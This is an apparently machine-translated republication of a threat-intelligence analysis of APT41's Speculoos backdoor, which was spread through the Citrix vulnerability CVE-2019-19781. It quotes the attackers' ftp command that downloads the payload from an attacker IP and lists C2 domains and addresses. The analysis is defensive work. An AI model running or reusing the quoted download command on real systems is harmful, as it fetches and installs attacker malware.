Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to analyze the APT41 Speculoos backdoor

2025-01-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to carry out APT41 Speculoos backdoor analysis, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

On March 25, 2020, FireEye released a report on the global attack activity of APT41. This attack, which took place between January 20 and March 11, focused on Citrix,Cisco and Zoho network devices. The researchers obtained samples of attacks against Citrix devices based on WildFire and AutoFocus data. Speculoos', also identified victims in a number of industries around the world, including North America, South America and Europe.

Speculoos is implemented based on FreeBSD, and a total of five samples are identified. All the sample files are basically the same size, and there are slight differences between the sample sets. Speculoos uses CVE-2019-19781 for attack propagation, and CVE-2019-19781 affects devices such as Citrix Application Delivery Controller,Citrix Gateway and Citrix SD-WAN WANOP, allowing attackers to execute arbitrary commands remotely.

Attack details

The attacker uses CVE-2019-19781 to remotely execute the command:'/ usr/bin/ftp-o / tmp/bsd ftp://test: [redacted]\ @ 66.42.98 [.] 220 shock'.

The first wave of attacks began on the evening of January 31, 2020, using a document called bsd, which affected a number of higher education institutions in the United States, medical institutions in the United States and Irish consulting firms. The second wave of attacks, which began on February 24, 2020, using a document called un, affected Colombian higher education institutions, Austrian manufacturing organizations, United States higher education institutions and state governments in the United States.

Malware based on BSD systems is relatively rare, and this tool is related to specific Citrix network devices, so Speculoos is likely to be developed by the APT41 organization specifically for this attack.

Binary analysis

Speculoos backdoors are ELF executables compiled with GCC 4.2.1 that can be run on FreeBSD systems. The load cannot maintain lasting control over the target, so attackers use additional components or other means of attack to maintain control. After the backdoor is executed, it enters a loop that calls the function to communicate with the C2 domain through port 443:

Alibaba.zzux [.] com (119.28.139 [.120)

If communication is not possible, Speculoos attempts to communicate with backup C2 on 119.28.139 [.] 20 through port 443. If you connect to any C2 server, it will do an TLS handshake with the server. Figure 1 shows the packets sent to the C2 server.

It requests login.live [.] Com as Server Name Indication (SNI).

After successfully connecting to C2 and completing the TLS handshake, Speculoos will fingerprint the target system and send the data back to the C2 server. Its structure is shown in Table 1 below.

Data is sent through the TLS channel, and the Speculoos waits for a two-byte response from the server. After receiving the response, it sends a byte (0xa) to C2 and enters a loop to wait for the command. Table 2 shows that the attacker can execute commands that give the attacker complete control of the victim's system.

The two Speculoos samples analyzed in the study are functionally the same, with only eight bytes different, resulting in different 'hostname'' and 'uname-s' commands when collecting system information. Uname-s returns kernel information, and hostname returns the host system name. The following figure shows a binary comparison between two Speculoos samples.

Impact assessment

Internet accessible devices that allow unauthorized users to execute remotely can cause great security problems. CVE-2019-19781 affects multiple Internet-facing devices, and attackers actively take advantage of this vulnerability to install custom backdoors. A large number of network activities of the affected organizations must pass through these network devices, and attackers can monitor or modify the network activities of the entire organization.

By default, these devices can directly access the organization's system, and attackers do not have to consider the lateral movement of the internal network. Attackers can modify network traffic, inject malicious code, perform man-in-the-middle attacks, or redirect users to fake login pages to collect login credentials.

On how to carry out APT41 Speculoos backdoor analysis to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 204

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report